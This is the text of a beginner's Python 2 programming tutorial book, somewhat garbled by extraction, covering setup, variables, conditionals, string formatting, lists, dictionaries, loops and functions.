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Python for Beginners

The Ultimate Guide to

Python Programming
Joshua Welsh
Introduction Chapter 1 Setting Up / Your
First Program .................................1
Chapter 2 Variables, Values,
Expressions, and Math .............6

Chapter 3
Chapter 4 String Formatting and Escape
Chapter 5 Data

Chapter 6
Chapter 7

Chapter 8 File I/O

Chapter 9 OOP
Chapter 10 Deeper into
© Copyright 2016 by Joshua Welsh
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Congratulations on downloading Python
for Beginners: The Ultimate Guide to
Python Programming and thank yo u for
doing so.

The following chapters will discuss the

Python programming language and how
to get started programming in this
multifaceted language.

Choosing to learn to program, especially

in the Python programming language, is
one of the most vital choi ces you can
make for yourself, both personally and
from a career context.

Learning to program will enable you in

multiple ways. First and foremost,
programming is an invaluable skill set in
the workforce. Not only does learning
how to talk to your computer enable you
to more positions in roles specifically
catered to computers and programming,
but it also makes you very in-demand in
career fields that are outside of that
scope. For example, in fields such as
biology and chemistry, being able to
program is a very marketable skill
because it demonstrates that you"re a
problem solver and that you"ll be able to
automate parts of your work as you need
to. Additionally, as technology begins to
become a bigger and bigger parts of our
life, there"s starting to be an even
greater intersection technology. of non-
computer disciplines with computer

Being able to program puts you in a

prime position where you"re at the
forefront of this intersection.

On top of that, learning to program

enables you to do a great more many
things in your personal life.
Programming as a hobby is incredibly
rewarding. You can program video
games, create mods for already -existent
video games, create applications to
automate certain processes - the
possibilities, really, are endless.

Python in particular is a fantastic choice

for all of this because Python is a
language which has a huge following and
user base. It"s arguably the most popular
scripting language, seeming to outpace
similar and related languages such as
Ruby and Perl. The documenta tion for
Python spans from proverbial wall to
proverbial wall. Python can be used for
anything from server-side web
applications to game programming to
fully fledged applications with GUIs and
complete functionality.

On top of this, Python is a great langu

age for learning the concepts underlying
all programming because

There are plenty of books on this subject

on the market, thanks again for choosing
this one! Every effort was made to
ensure it is full of as much useful
information as possible, please enjoy!
In order to do anything with the
beautifully articulate Python
programming language, you first have to
set up an environment in which you can
do things. I"d say that goes without
saying, though.

You"re going to need a few different

things in order to get your Python setup
going. Firstly, you"re going to need to
install Python itself or check to see if
it"s already installed.
Verifying the install is pretty simple. In
Windows, press the Windows key and
search for “Python”. If it"s there, it"ll
pop up in the list of applications. On
Mac and Linux systems, open up the
Terminal and try to run the command
python. Your output should look a bit
like this:
user@userpc:~$ python Python 2.7.12 (default, Jul 1
2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more
If this is the result you got, then perfect.
If you don"t have Python installed, you"ll
get a message that says something along
the lines of “command python is
In this case, you"ll need to install
Python. Most full -featured desktop
installations of Linux systems - be they
Ubuntu, Fedora, Debian, CentOS, or any
derivative of those - will most likely
have Python by default. Mac OS does a s
well. Windows normally does not.

Regardless, if you don"t have Python,

you obviously are going to need to, well,
get Python.

The simplest way to go about this is by

simply going to the Python website
( From there, you go to the
downloads page. For the purposes of
this book, we"re going to be working
with Python 2.7.12. The reason that
we"re doing this is because almost all
legacy code you"ll encounter and,
indeed, a lot of the code being written
today, is written in Python 2. Python 3
very wel l may be the future, but it"s not
the current. If you run into an event
where you need to work with Python 3,
it"s super easy to transfer your skills
over to Python 3 anyway. Pay careful
attention to the installation process on
Windows, and if there"s an o ption to
create PATH variables, ensure that it"s
selected. PATH variables are what
allow you to launch a program from the
command line and perform certain
actions with it.

Once you have Python installed, we"re

going to need to install a text editor from
which we"ll work with Python. You may
be tempted to work with the Python
IDLE, but this really isn"t the best idea.
It"s much better to get a text editor, if
only for the reason that 1) you learn the
environment and can work with
numerous different programmi ng
languages from within it, and 2) you can
grab plugins which will make your job
as a programmer much easier.
Whether you"re doing this for a career
or a hobby, you"re a programmer now.
And very, very few programmers use the
Python IDLE. Some prefer emacs , some
prefer vim, some use Sublime Text,
others use Notepad++.
For the purposes of this book, we"re
going to be using something called
Atom. You can grab this from their
website ( The reason that we"re
using Atom is because it"s super simple
to set up, can be used on any major
platform, and is incredibly customizable
and extensible. It"s a great starting point
for text editors.

If you have a friend who"s trying to get

you into programming and saying “no,
you have to use insert text editor here!”,
then there"s nothing wrong with
appeasing them. Text editors are just
environments to write code. But if
you"re new and scared of what the
world of programming may hold, Atom
is a very safe choice.

Anyway, you go to and just head

to their downloads page and grab a copy
of the software. Install it and you"re
ready to go.

The other reason we"re not using the

IDLE is because it teaches you to use a
crutch. I want you to learn how to launch
Python code using the command line,
because it"s just frankly important
knowledge to have. In this way, you also
need to know how to navigate and
perform basic commands within the
command line. In Mac and Linux, this
command line is called Terminal. In
Windows, you won"t be using the
standard command line - instead, you"ll
be using the PowerShell, which you can
find by simply searching for PowerShell
in the start menu.
If you don"t have basic knowledge of
file system navigation via command line,
then frankly you need to learn it. It"s
beyond the scope of this book, a nd I"m
not going to cover it in here because
there"s precious time to be spent
teaching other things.

Create a new folder where you"d like to

store your code. Then open Atom and
right click the sidebar to the left. Click
the object that says “Add Project F
older”, then choose the folder that you
just created. Then left -click the project
folder on the sidebar. It"s now the active
folder. Right click anywhere on the
sidebar and click “New file”.

On the dialog that says “Enter the path

[...]” you can just enter a filename.
We"re going to call this file
Technically, you could call it anything
you like. This isn"t like Java where the
filename has to correspond to something
in the code. But for simplicity"s sake,
yes, we"re calling it

Within, type the following:

print “hello world”

Then save the file. The shortcut for this,

if you don"t know it, is Ctrl+S.
Head back to your Terminal/PowerShell.
Navigate to the folder which has the file, then execute it by typing the
Your output should look something along
the lines of this: user@userpc:~/Python$ python
hello world

If that"s how it came out, then awesome.

You just wrote your first Python
program. How proud are you? I"m pretty
proud of you. Now we"re going to work
on some more important concepts like
variables and math.

Wordy chapter title, no? Well, these
concepts are super duper important.
There"s no way to really undervalue any
of them, so we"re going to go through
them one-by-one.

The first thing you need to do for this

chapter is create a new file. Call it This is what you"re going to be
working with throughout this whole
chapter. We"re going to do this every
chapter, so just get used to that se t of
In your new file, we"re going to be
working with a couple of new ideas. The
first of these are variables.
Variables and Values

What are variables? Variables are

things which store a given value. These
values can have many different forms . In
languages such as Java and C++, you
have to explicitly declare what type of
variable you"re creating.

For example, in order to declare the

variable car and give it the value of
“Nissan Maxima” in Java, we"d have to
do something along the lines of:
String car = “Nissan Maxima”
Python makes this super simple though.
We don"t have to declare the type at all.
We can just do this:
car = “Nissan Maxima”

Python, ever knowledgeable, knows

exactly what type we want without us
saying it at all. That"s impress ive. It can
do this because we imply that it"s a
string variable by the fact that its value
is, well, a string.

It"s important to know about types

though, because there are some things
you can"t do. For example, if you
compared the following variables:

num1 = 12
num2 = “12”
They wouldn"t be the same, since num2
is a string while num1 is an integer.

What are the primary types of variables

in Python? Fantastic question, my friend.
These are the primary types and their

Type Description Declaration example

Integer A whole number kindsOfCheese = 3
Float A decimal number weightOfCheese = 3.88
Boolean True or False hasCheese = True
String Text nameOfCheese = “brie”

Super important distinctions, but Python

makes it relatively easy to deal with all
of these.
Go into and create two variables.
One will be called favoriteFood and the
other will be called days. For
favoriteFood, set it to be a string which
states your favorite food. days should be
an integer with a number that y ou make

My example looks like this:

favoriteFood = “thai
curry” days = 40
Now let"s print our favorite food to the
console and tell the world!
print “My favorite food is %s.” % favoriteFood

We"ll talk more about what exactly our

print command just now meant in the
next chapter. In the meantime, though,
let"s talk about variables and how they
can change.

After your print statement, you need to
change the value of your favorite food.
Go ahead and make it your second
favorite food. Your code should then
look a little like this:
favoriteFood = “thai
curry” days = 40
print “My favorite food is %s.” %
favoriteFood favoriteFood = “pizza”

Now let"s add another print statement

and make sense of all of this.
print “Wait, never mind! I ate that %d days in a row.
I"m sick of it. My favorite food is now %s.” % (days,

Save and execute again. You should see

that the favoriteFood variable changed
on the second instance! Crazy.

That"s because you just used an

assignment operator. Assignment
operators are one of several different
types of operators in Python which can
be used to deal with values.

= is the simplest one, and just means that

variable x takes the value of variable y,
like so.
There are a few other assignment
operators t oo. Here"s the full list:
Operator Example Meaning

= x = y x is y += x += y x = x + y
-= x -= y x = x - y *= x *= y x = x * y /=
x /= y x = x / y %= x %= y x = x % y **=
x **= y x = x ** y //= x //= y x = x // y

Some of these don"t make sense, but they

will in a second. The point to drive
home here is that these are massively
important and useful. For example, you
can use them in order to increment.
Consider the following example:
# i is 3, but we want to add one to it. i += 1
# The underlying arithmetic is i = i + 1. #Substituting
variables for their value: i = 3 + 1
# So, i is now 4.

These build upon what are called the

arithmetic operators. These are easy to
Operator Name Function
+ Addition Adds values together.
- Subtraction Subtracts a value from
* Multiplication Multiplies values.
/ Division Divides values.
% Modulo Gives remainder. (7 % 2 = 1)
** Exponentiation Denotes exponent.
(2**2 = 4)
// Floor division Floor division.
There"s one more type of operator that
we"re going to discuss, and we"re
actually going to discuss it while
discussing the broader concept of
expressions. Expressions

We"ve talked about how things can have

an inherent true -orfalse value, right?
You may remember from high school or
college math working with something
called expressions. These were different
from equations, in that they weren"t
meant to be evaluated. They were simply
true or false. Ringing any bells?
Anyway, Python - and programming
languages in general - accomodate for
expressions. In fact, they don"t only
accommodate them, but they provide for
them, and quite handily at that.
Expressions provide for a portion of
programming known as control flow,
which is crucial. Programs often aren"t
linear. There are a ton of decisions to be
made in the writing and execution of a
program, and there will be situations
where you certainly have to make
different decisions based upon a piece
of data.
There are a very different ways to do
this. The most general way is with
something called a conditional operator.
These provide ways to compare two
different values.

Here are the primary conditional

Operator Meaning
x == y x is equal to y
x != y x is not equal to y
x <= y x is less than or equal to y
x >= y x is greater than or equal to y
x < y x is less than y
x > y x is greater than y

You can also store these to variables.

That"s because all these expressions do
is evaluate themselves and then return
True or False. So you may have an
expression, but all that value represents
is a single True or False. Like this:
votesForCat = 4
votesForDog = 5
dogsWin = votesForCat < votesForDog
print “Do dogs win? %r” % dogsWin

If you coded this, the output would be

along the lines of: Do dogs win? True

So our variable “dogsWin” evaluates the

expression of “votesForCat are less than
votesForDog” and returns whether it"s
true or false, then stores that.

This is a really big part of the upcoming

lesson on conditionals. There are
numerous aspects which make this a
very relevant and important lesson to
learn, but regardless of the numerous
“why”s, the lesson to take home is that
this is one of the more central and core
concepts of programming: comparing
variables to one another and making a
decision based off of that information.

In the following chapter, we"re going to

work on some more exact and dedicated
examples of this phenomenon.

As I"ve said before, the notion of
comparing values and making a decision
is incredibly integral to the entire field
and subject of computer programming.
Computers, at their cores, are just ones
and zeroes. Bits constantly being
compared, moved around, chang ed, all
of that. The ability to take these and
compare them to one another and make a
decision opens up so many possibilities.

There"s one major way to do this in

Python. This is through the use of
something called an if statement.

An if statement can be defined as a

chunk of code which looks at an
expression, evaluates, and then takes
action if that expression is true.

Potential conditionals
The first thing we"re going to cover are
the simplest form of if statements. I call
these potential conditionals, be cause no
code is guaranteed to be ran unless the
expression works out to be true.

Create a new file called We"re

going to go ahead and type the following
code within it, which is coincidentally
an insight into the mind of a six-year-
bananas = 6
fireTruck = “red”
if bananas == 0:
print “Uh oh, something went wrong - I don"t have any
print “Did you know fire trucks are %s?” % fireTruck

Execute and run the code. Your output

should be something along the lines of
user@userpc:~/Python$ python Did you know
fire trucks are red?
Why do you think that it didn"t output the
string before? Yes, the answer is as
obvious as you think.
First, it looked at the expression:
if bananas == 0
Then it parsed it into its values:
if 6 == 0

This is clearly not true, so the code

following it wasn"t executed. Easy

But wait, what if we want to see if

something is not true? Well, this is
where there"s actually another
conditional operator that we need to
cover. This one is called the negative
operator. Let"s go ahead and change the
if statement to look like this:
if not bananas == 0:
print “Wow, I have bananas!”

Now run your program again. The output

should look like this:
Perfect. We now know we have bananas.
There"s also another way to evaluate
this, though. Remember the inequality
operator? We could also easily have
user@userpc:~/Python$ python Wow, I have
bananas! Did you know fire trucks are red?
if bananas != 0:
print “Wow, I have bananas!”

When doing mathematical comparisons,

it"s generally not useful to use this. But
for boolean expressions, it"s really
useful. For example, if we had this chunk
of code:
hasBananas = True
if not hasBananas:
print “I don"t have any bananas!”

It"d work great. You don"t actually have

to write out if hasBananas != True
or if hasBananas == False

The important thing to drive home here

is that boolean conditionals are very
simple and since expressions innately
check for being either true or false, since
booleans have an innate veracity, you
don"t have to compare one veracity
against another. All veracity is constant,
and if the boolean variable is “true”,
then it"s “true”. Full stop. The
conditional operation will realize such.
Philosophical, right?

Anyhow, all the not operator does is

check to see if the following expression
is true instead of false. This can be very
useful though, and it"s important that you
learn and remember it.

Absolute conditionals
But what if you want a block of code that
checks a condition and still does
something, even if it"s not true?
Let"s just erase the code we have in so far, we"re going to redo some
of this.

The first thing we want to do is ask how

many bananas the person has. But we
also want to store this to a variable.
How can we do this?

Well, first we have to create the

variable: bananas =

And then we have to figure out how to

retrieve the information. In Python 2, we
do this using a method called
raw_input(). This is not to be confused
with input(). input() allows the user to
enter Python code and it"s overall just a
huge security risk to leave that kind of
access to your code exposed, so we"re
going to avoid that altogether.

raw_input() also has a handy feature

which allows you to print out text
alongside of it. This simplifies a chunk
of code like:
print “How old are you?” age = raw_input()
so that it"s just more along the lines of
age = raw_input(“How old are you?”)

Note the way that the raw_input function

works, too! We"ll talk about return
values when we talk about methods, but
this method returns a string, which
means that whatever variable is assigned
the value of raw_input() is ultimately
going to be a string.

Anyway, so now we know how we can

to the banana code. Write in your now
empty code template this line of code:
bananas = raw_input(“How many bananas do I have?

Perfectly simple. We now have a

variable called bananas which carries a
string of whatever the user entered.
Great start.

Now we"re going to start working on the

chunk of code.

Let"s assume we want to juggle ba

nanas. If we only have 1, we obviously
can"t juggle the bananas, right? So we
want to make that clear. Let"s make an if
if bananas == 1:
print “I can"t juggle these bananas, I only have one!”

But wait… if you run this, you"ll get an

error. Why? Because bananas is
currently a string data type. We have to
turn it into an integer. How do we do

This is called casting, and Python

actually makes it relatively
straightforward. What you do is you
name the type that you want to cast to,
then in parentheses the variable you"re
trying to convert to that type. If you
wanted to turn a string into an integer,
you"d do this:

That"s exactly what we want to do here.

So let"s work with that. Above your if-
statement, let"s turn bananas into an
integer. Your code should now look like
bananas = raw_input(“How many bananas do I have?
bananas = int(bananas)
if bananas == 1:
print “I can"t juggle these bananas, I only have one!”

So far, so good. If you"d like, you can

test this out by runn ing it and entering 1
when prompted for the number of
bananas. It should output the text “I can"t
juggle these bananas, I only have one.”
Complex stuff. Anyhow, we have to
implement a safety, though. This is
where the absolute cause of absolute
conditions comes from. Absolute
conditions ensure that code will be run
no matter what happens. These are
otherwise called if else statements.
If (condition) is true (
otherwise, do this (

Both absolute and potential conditions

deal with what happens if a condition is
true, but only absolute conditions deal
with what happens if they aren’t true.
Let"s modify our code a bit.
if bananas == 1:
print “I can"t juggle these bananas, I only have one!”
print “Juggling has commenced. Viva
la révolucion.”

Save your code and run it and try putting

something other than 1. It should say
“juggling has commenced” and then call
for the jugglers of the world to unite.
However, what if we had 0 bananas? It
still says that. But you can"t juggle 0
bananas. This is a paradox, and I"m no
longer satisfied with the state of the
code. We need to add something else to
we need to check for another condition.
“How can we go about doing that?” you
ask? It"s impossibly simple, actually!
We use what"s called an else if
statement. So let"s fix this code right
quick, and add a stipulation for if
bananas are 0.
if bananas == 1:
print “I can"t juggle these bananas, I only have one!”
elif bananas == 0:
print “I have 0 bananas. I urgently need bananas
before juggling.”
print “Juggling has commenced. Viva
la révolucion."

There we go. That"s perfect! Save this

chunk of code and run it, let"s see what
we can get out of it. Test it out by
entering different values. It should
change depending on whether you put it
0, 1, or anything else.
I mentioned earlier that I was going to
explain at a later point what exactly is
going on with the print statements I was
using. The explanation is relatively
simple, but a bit more nuanced and
difficult to grasp entirely.

Basically, what we were using was a

formatted print statement. These mean
that you give it a string to output, which
is formatted with other variables. This is
the cleanest and best way to print
strings, regardless of how you"re doing
them, and is considered best practice far
and wide.

Go ahead and create a new file called Within this we"re going to create
a couple of variables. Let"s create a
variable called dogs and give it the
value of 3, a variable called cats and
give it the value of 4, a variable called
horses given the value of 0, and a
variable called frogs with the value of 1.
It should look like this:
cats = 3
dogs = 4
cows = 0
sheep = 1
pigs = 3
Now let"s print out what we have.
print “I have %d cats, and I also have %d dogs.” %
(cats, dogs)
print “I have %d cows,\n%d sheep,\nand %d pigs.” %
(cows, sheep, pigs)

print “That means I have:\n\t%d livestock.” % (cows +

sheep + pigs)
Save this and run it. Your output should
look a bit like this:
user@userpc:~/Python$ python I have 3 cats,
and I also have 4 dogs. I have 0 cows,
1 sheep,
and 3 pigs.
That means I have:
4 livestock.

Super simple, right? Let"s break this

down part by part and see how we got
from that code up there to what we have
in the console.

Formatting Sequences

So, in a formatted string, you have

several different ways to print out
information. A formatted string has to
actually convert all of the data to a string
so that it can be printed out, and we tell
it where we have data we want to inse rt
by way of something called formatting

Here are the primary formatting

sequences and their meaning.
Sequence Meaning

%d Base 10 integer. Most ordinary whole numbers.

%f Floating point number.
%xf Float, decimal cutoff. 9,9955: %2f = 9.99, %3f = 9.995 %r
Raw data. Normally used for debugging, not release. %s

Go back and look at the code we had

and see if you can connect the dots and
see why and where we used each one.
There are more, but these are the ones
you need to know as a beginner.

“But wait, what about the weird \n and \t

Escape Sequences

Oh, you thought I"d forget about those?

No way. Those are called escape
sequences. What they basically mean is
that the character after the backslash ( \)
doesn"t mean what it normally does. \n,
for example, means to move to a new
line. \t means to tab over. You don"t
really need a chart for this, it"s rather
self-explanatory. There are more, but
those are the primary ones. There"s only
one more class you need to know at this
point in your programming career, and
those are the punctuation escape

See, there may be times in your code

where you really need to use a quotation
mark or a backslash. Maybe you"re
quoting someone or telling a story, or
teaching programming concepts like
escape sequences through a program.
Either way, if you just throw in a straight
-up quotation mark or backslash, it"s
gonna throw things off. You have to
denote specifically that you want to print
these characters by using an escape
sequence. \” would give you a quotation
mark, \" would give you a single
quotation mark, and \\ would give you a

With all of that said, it"s time to move

onto a much heavier and more important
concept: data sets. You"re going to learn
what they are and how to manipulate
them in the upcoming chapter.

It"s that time now: you have to learn
about data sets. You"re growing up so
fast! These are essential to
understanding the other important part of
control flow aside from conditional
statements: loops. Loops are more often
than not used to iterate through either a
list or a set of data, so we may as well
cover our bases and talk about data sets

There are a few different kinds of data

sets, but the two most important ones to
know in Python ar e lists and
dictionaries. Are there others? Sure.
Are they far more esoteric? Definitely.
This will cover the bases for what you
need to know, certainly. Let"s start out
with lists.


Okay, it"s storytime. This will become

more relevant later when we talk about
string manipulation and string methods.
Once upon a time, there was a language
called C. C became extremely popular,
and with it popularized the concept of
data arrays. C-style data arrays set the
standard for what would become the
basis of lists and sets in any given
language following.

The basic idea behind data arrays is that

you often have data that you want to
group together. Let"s say you have 5
different grades for students. You
wouldn"t want to type this:
int student1Grade = 44; int student2Grade = 96; int
student3Grade = 73; int student4Grade = 89; int
student5Grade = 100;

For one, that"s tedious. Secondly, that"s

hard to keep up with when you have a lot
of them. Plus, there"s the chance that you
make a typo somewhere and have to fi
gure it out later, and it"s just a whole
mess. Besides, they"re all grades. Why
wouldn’t you keep them together?

Arrays simplified that. They could

declare an array like this:
int grades[5] = { 44, 96, 73, 89, 100 };

This bundled all of the grades toget her

into one set of data. If you wanted to
change the first grade in the array, you"d
just go
grades[0] = 45; // 0 because computers start counting
from 0, not 1.

See how much simpler and less

complicated that is? It also allowed for
things like sorting a lgorithms, which we
won"t cover in this book. When data is
grouped together in a way like that,
you"re able to iterate through it and
compare different objects in it.

Anyway, that"s the gist of that.

This set the stage for lists in Python.

Arrays have a set amount of data they
can hold, and a fixed type for all of that
data. Lists in Python are better than
arrays for two reasons:

1) They automatically readjust their size

depending upon how many elements they
2) You can have multiple types within a
set of da ta. The second is especially
useful when you"re dealing with parent
and child classes (as we"ll discuss
later) and want to put both types in the
same list.

Lists in Python are easy enough to

declare. Let"s take the former grades
example. If you wanted to create a list
that inhabited all of those grades, you
could do it in one fell swoop:
grades = [44, 96, 73, 89, 100]
Perfect. If we wanted to print out the 2nd
grade from the list, we"d just type the
print grades[1]

See? An absolute piece of cake. But

what if you got a surprise late
assignment? We can add a grade to that
list incredibly simply using the append()
grades.append(45) # half credit for being a slacker.
We can verify that we actually added the
variable by printing the sixth item of the
print grades[5]
This would print out 45. Simple enough.
Now, to remove an element from a list is
likewise very simple. There are two
different ways. The pop() method returns
the value, which often isn"t what you
want. Instead, there"s the del keyword,
which will straight up remove the
element from the list.
For example, if you printed out the
grades list, as it stands, you"d see this:
>>> grades
{ 44, 96, 73, 89, 100, 45 }
Let"s say the person responsible for the
44 dropped the course. We could delete
their grade like so:
del grades[0]
If we tried printing the grades list again,
it"d look like this: >>> grades
{96, 73, 89, 100, 45 }
Now the results are looking a little bit
better, no?

But surely there"s a way to improve

upon t his. Right now, we can"t search
by student name to see who had what
grade! This is where dictionaries come
into play.


The name of dictionaries come from,

believe it or not, real dictionaries. Think
about it. You look up a word in a
dictionary and you find a definition.
Dictionaries in Python, and most
programming languages really, work
very similarly. Dictionaries are
essentially a map and key interface. You
give a set of keys, which map to a given
value. Simple enough, right? Let"s go
back to our grade example.

Let"s say we wanted to a grade to every

student for a given assignment, and then
reference their grade by name. Create a
new file called What we"re
going to do in this first is create a new
dictionary called assignment1Grades. Th
e keys are going to be the student names,
and they"re going to map to a certain
value - here, of course, being their
grades on the proverbial assignment one.

Great. So, let"s get started. Let"s say we

had a student named Jack Duke who
made a 44, a student named Jacob Green
who made a 68, a student named Kevin
Thomas who made a 99, and a student
named Brad Smith who made a 73. The
way we"d declare that dictionary is like
assignment1Grades = { "Jack Duke" : 44, "Jacob
Green" : 68, "Kevin Thomas" : 99, "Brad Smith" : 73}

See what"s happening here? The

respective strings for their names are
acting as keys to the given values.
After that, let"s go ahead and prompt the
user for which grade they"d like to pull
userIn = raw_input(“What grade would you like to pull

Now we check to see if the string they

entered is even in the data set. This is
super easy in Python. In other languages,
you"d have to iterate through the whole
data set with a loop, but Python just lets
you straight up see if it"s in th ere or not,
using the aptly named in keyword. This
happens like so:
if userIn in assignment1Grades: # the beauty of
print assignment1Grades[userIn]
print “That"s not a valid name.”

Notice how we fetched the value

mapped to the key represented by the
userIn value. Save this and test it by
entering student names and then things
that aren"t there at all. It should print out
the grades mapped to the names if you
enter a proper name or tell you the name
is invalid otherwise.

A lot of places uses a keymap system

very similar to this. Think of grocery
stores, where every item has a SKU
number or a UPC code that is linked to
it. You can actually reverse search an
item by SKU to find the exact model. It"s
super impressive, and a real-world
application of this technology so you
don"t find yourself thinking “when will I
ever use this?”

Anyhow, that covers the two main data

sets in Python. Now it"s time to talk
about how we can iterate through them
with loops.
Loops are a major part of programming
and control flow. In fact, I"d argue
they"re by far one of the biggest parts.
Most programs will demand utilization
of a loop in one way or another. Loops,
especially to a novice programmer, may
sound silly. Time will show you,
however, th e numerous uses and
applications for the various sorts of

There are two different kinds of loops in

Python: while and for. For loops are the
most important, so I"m going to spend
the most time talking about them. For
now, let"s talk about while loops.


While loops are loops which occur

while a condition is true. For as long as
that value holds true, the loop will
continue to execute.

The first use which springs to mind for

this sort of loop is what"s called a
“game loop”. Game loops are comprise
d of two parts: a boolean which
basically says whether or not the
program is running/the user has chosen
to quit, and a while loop which runs a
given set of code for as long as the user
hasn"t stated they"d want to quit. Create
a new file called ch6
In this, create a variable called run and
set it to True, and then create a variable
called total and set it to 0.
Below that, we want to create a while
loop. We could say while run == True,
but as we learned earlier, that"s
redundant. We"re just going to say this
while run:
There we go, nice and clean. Now
we"re going to print the total and have
the user enter a number to add to it.
userIn = raw_input(“\n\n\nCurrent total is: %d.\nEnter
a number, or anything else to exit.\n” % total)

Now we"re going to check to see what

they entered. String objects have built-in
things called methods - most objects do,
in fact. There"s a very handy method for
this exact purpose called
string.isdigit(). So let"s say that if the
string the user entered is a digit, we add
it to total. Otherwise, we leave the loop.

First, we construct the first part of the if

statement: if userIn.isdigit():

Then we need to code what happens.

First, we take total, then we have to add
to it what the user entered. But before
we do that, we have to convert the string
the user entered into an int. Here"s how I
did it:
total += int(userIn)
In the else statement, we need to exit the
loop. Since the loop is running for as
long as the condition is true, the
condition here being “while the variable
run is set to True”, we just have to
negate that condition by setting run to
print “\nGoodbye!\n” # a goodbye message -we aren"t
run = False

By the end, your code should look along

the lines of this:
run = True
total = 0
while run:
userIn = raw_input("\n\n\nCurrent total is: %d.\nEnter
a number, or anything else to exit.\n" % total)
if userIn.isdigit():
total += int(userIn)
print "\nGoodbye!\n!"
run = False

Super easy. Save that and run it and test

it out. For me, it looked like this:
looked like this: Current total is: 0.
Enter a number, or anything else to exit. 3
Current total is: 3.
Enter a number, or anything else to exit. 9
Current total is: 12.
Enter a number, or anything else to exit. fl

Flawless and functional. True

innovation. Anyway, that"s pretty simple
and approachable, right? Now onto the
fun part: for loops.
For loops

In ye olden days of computer

programming, for loops were very
different from they are in Python. Then,
they had three parameters: the iterator
variable"s starting value, the condition
of the loop, and the iteration equation.

For example, if you had an array of 5

values - let"s go back to the old example
and call the array grades - and you
wanted to print all of them in Java, it"d
be something like this:
for (int i = 0; i < grades.length; i++) {
Python, as it tends to do, massively
simplifies this. It recognizes that most
for loops are used for iterating through
sets of data and gears itself towards that.
Let"s take that same data set that we
were just talking about, and iterate
through in Python:
for i in
grades: print i

“i” here is the iterator variable, and can

assume the form of whatever data type is
in the data set. That i s to say that if you
made a type called animal, and you had
a set of the animal type, and every
member of the animal type had a method
called sleep(), then you could do this:
for i in animalList:

It"s important to note that the iterator

name can be anything though - it
certainly does not have to be “i”. A
common example that may trip you up
later is iterating through the lines of a

If you had a file and wanted to read it

line by line, you"d write the following
file1 = open(„filename.txt") for lines in file1:
# do something

“Lines” is just the iterator variable for

every string in file1, where each line is
seen as an individual string and the file1
as the data set containing said strings.
That"s a convoluted explanation, but
hopefully gets a question that you either
have now or will have later squared
away and neatly tucked off.

You"re not restricted solely to data sets

with for loops, though. Let"s say you
wanted to iterate through code 5 times,
but didn"t have a specific data set y ou
were looping through. You could use the
range() function to make that happen.
for i in range(5):
# do something
That code would run 5 times. If you
wanted to count from 1 to 10 using for
loops, you could do this:
for i in range(10):
print i+1 # i+1 because the computer starts counting at

That"s the bulk of what there is to know

regarding for loops. Now, we"ve got to
get into a topic that makes up literally
every programming language and plays a
huge part in any semi-sophisticated

Let"s face it: you"re going to have long
programs. You"re going to have
programs which do a lot of things. You
may have one chunk of code you have to
reuse over and over to do this or that.
Copying and pasting everything that
you"ve got to utilize is going to be very
unwieldy and altogether just very
difficult to read for anybody who comes
along and has to maintain your code (this
includes the future version of you, who
will inevitably look at code that the past
you wrote and wonder what in the world
you were actually trying to say.)

There"s a way to fix this problem

though. There"s this magical little utility
that Python provides - as does pretty
much every programming language -
called a method.

A brief explanation, because I"m pretty

sure that I"ve said both at different times
in this book: a function and a method are
the same thing. Well, technically. Both
refer to a set of code which optionally
returns a value and can be called from
within other methods/functions.
Function is typically the term for these
that would be used by C and C++
programmers. Method is the term used
within object oriented programming
languages such as Python. There"s no
difference between the two, and if you
mention a function to a Python
programmer, you may get a funny look,
but they"ll know exactly what you mean.
“Method” and “function” are
interchangeable. Per habit, I call them
function, and will probably do so
throughout this chapter. Just know that
function means method means function.

So let"s look at how a method may be

set up in C-style pseudocode.
main function
{ int x;
x = doSomething(3); }
doSomething(int y) { // code here
return y;

Make any sense? Let"s break this down.

The definition for a function across most
languages is like this:

return data type

functionName(arguments) { code
return value (if relevant, not all
functions need to return a value)

So, for more pseudocode, let"s say we

wanted a function that accepted any
number, and gave back to you that
number multiplied by 3. How do you
think we"d do that?

It"d look a bit like this:

multiplyNum(number) { return number * 3; }

Then if we had a main function… Can

you guess what x would be? If you
guessed 3, then you"re absolutely right.
This may remind you a bit of the whole
f(x) exercises from high school and
college math.
main {
x = multiplyNum(3); }

Luckily, Python - as it does with most

things - makes working with functions
super -duper incredibly easy. You don"t
have to declare any given return type,
you just kind of make the function. You
don"t have to specify the data types of
the argument, they"re implied by your

In order to declare a function in Python,

here"s all you have to do:
def functionName(arguments): # code here
Simple, right?
Create a new file called . We"re
goin g to be working with functions for a
moment (how exciting).
Let"s make a home square footage
calculator. It"s going to be super simple
for our purposes and assume that every
room is a perfect square, but it"s a
starting point.

The first thing we want to do is make a

list to store all of our rooms" square
footage. We don"t know the size of any
rooms yet, so let"s just make it an empty
list, like so:
rooms = []

Afterwards, we need to make a method

to calculate area. What it"s going to do
is take the lengt h and width, then print
the room square footage, then finally
return that square footage. This will
make more sense contextually within the
main part of the program.
For now, just make the method.
def calculateArea(length, width):
print “\nRoom square footage: %d” % (length * width)
return length * width

After that, we need a function which

takes our list of room square footages
and adds them together to return the total
square footage of the house.
def addRooms(roomList): sqft = 0
Now we have to iterate through the list:
for room in roomList:
Then we have to add whatever value
“room” is to the total square footage
variable (sqft).
sqft += room # sqft = sqft + room
Then we just have to return the total
square footage: return sqft
Now we can get to the actual chunk of
our program. How neat!

The first thing we want to do is ask how

many rooms the house has. We"re going
to have to convert this to an integer data
type, so we"re going to get input, but
we"re also going to place the integer
type cast wrapper around it. This is
wordy, but here"s what I mean:
roomCount = int(raw_input(“How many rooms does
the house have? “))

Now, when the user puts in a number,

it"ll automatically be changed from a
string to an int. There are more verbose
ways of doing this, like this:
roomCount = raw_input(“How many rooms does the
house have?”)

But we just saved a fair amount of space

and programming time and made prettier
code, so what we did works super well.

Now we need to use that roomCount inte

ger in order to iterate through a loop.
With every iteration of this loop, we
want to get the length of a room and the
width of a room, then calculate the area
of the room, then add the room to our
rooms list. It"s also important to not
forget that since w e"re dealing with
raw_input, we have to cast these length
and width variables to integers just like
a second ago.

So first we have to declare our loop:

for i in range(roomCount):
Then we have to get the length and
length = int(raw_input(“\nWhat is the length? “))
width = int(raw_input(“\nWhat is the width? “))

After that, we need to get the area from

those two variables. We"re going to send
them to our calculateArea function.
Since that function returns a value, we
can store the result of the function to a
variable. Following? Observe.
area = calculateArea(length, width)
Easy peasy. So next, we"ve got to add
that to our list:

If you"re interested in more shortcuts,

then we actually technically could have
avoided creating an area variable at all.
Since the calculateArea function returns
a value, and the rooms.append function
takes an argument of a value, we can just
through the calculateArea function right
into the rooms.append function:

